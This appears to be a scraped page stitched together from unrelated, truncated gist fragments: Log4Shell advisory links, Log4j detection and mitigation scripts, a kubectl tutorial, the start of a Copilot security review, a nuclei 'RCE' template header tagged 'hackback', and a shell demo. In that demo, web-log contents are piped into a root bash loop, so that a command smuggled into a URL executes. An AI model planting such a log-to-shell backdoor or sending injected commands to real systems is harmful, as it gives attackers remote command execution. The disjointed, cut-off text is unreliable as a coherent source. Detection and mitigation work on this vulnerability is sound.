Magno Logan magnologan

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

If you want to add a link, comment or send it to me
Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

Royce Williams list sorted by vendors responses Royce List
Very detailed list NCSC-NL
The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

Update: Please see Bishop Fox's rapid response post Log4j Vulnerability: Impact Analysis for latest updates about this vulnerability.

Technologies using Apache Log4j

The Cosmos 🌌 team at Bishop Fox 🦊 is currently researching open-source projects that appear to use Log4j by default.

Apache Druid
Apache Dubbo
Apache Flink
Apache Flume

Kubectl output options

Let's look at some basic kubectl output options.

Our intention is to list nodes (with their AWS InstanceId) and Pods (sorted by node).

We can start with:

kubectl get no

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

	#!/bin/bash
	#########################################################################################################
	# Script to identify Log4J affected class for CVE-2021-44228 in a collection of EAR/WAR/JAR files
	# Based on this script:
	# https://github.com/righettod/toolbox-pentest-web/blob/master/scripts/identify-class-location.sh
	#########################################################################################################
	if [ "$#" -lt 1 ]; then
	script_name=$(basename "$0")
	echo "Usage:"
	echo " $script_name [BASE_SEARCH_FOLDER]"

	#!/bin/bash
	set -x

	function setenv-all-pods() {
	echo
	DEPLOYMENT_LIST=$(kubectl -n $1 get deployment -o jsonpath='{.items[*].metadata.name}')
	echo "Set Log4J setting for all pods by overriding LOG4J_FORMAT_MSG_NO_LOOKUPS with true."
	for deployment_name in $DEPLOYMENT_LIST; do
	kubectl -n $1 set env deployment $deployment_name LOG4J_FORMAT_MSG_NO_LOOKUPS="true"
	done

	#! /usr/bin/env python3

	'''
	Needs Requests (pip3 install requests)

	Author: Marcello Salvati, Twitter: @byt3bl33d3r
	License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)


	This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.

	id: nuclei-rce

	info:
	name: Nuclei Template RCE by Chromium
	author: c3l3si4n
	severity: critical
	tags: rce,hackback

	headless:
	- steps:

	#!/usr/bin/env python
	# -- coding: utf-8 --
	# Thomas Roccia \| IconDhash.py
	# pip3 install lief
	# pip3 install pillow
	# resource: https://www.hackerfactor.com/blog/?/archives/529-Kind-of-Like-That.html

	import lief
	import os
	import argparse

	$ echo "while :; do grep "BAH~" /var/log/apache2/interesting.log \| cut -f 2 -d \"~\" \| tr '_' ' '; done" \| exec bash

	$ wget --no-check-certificate 'https://interesting/?BAH~touch_/tmp/foo~'

	root 10680 10679 0 21:27 pts/1 00:00:00 /bin/bash
	root 11125 10680 17 21:27 pts/1 00:00:02 bash

	$ ls /proc/11125/fd
	total 0
	dr-x------ 2 root root 0 Jun 28 21:27 .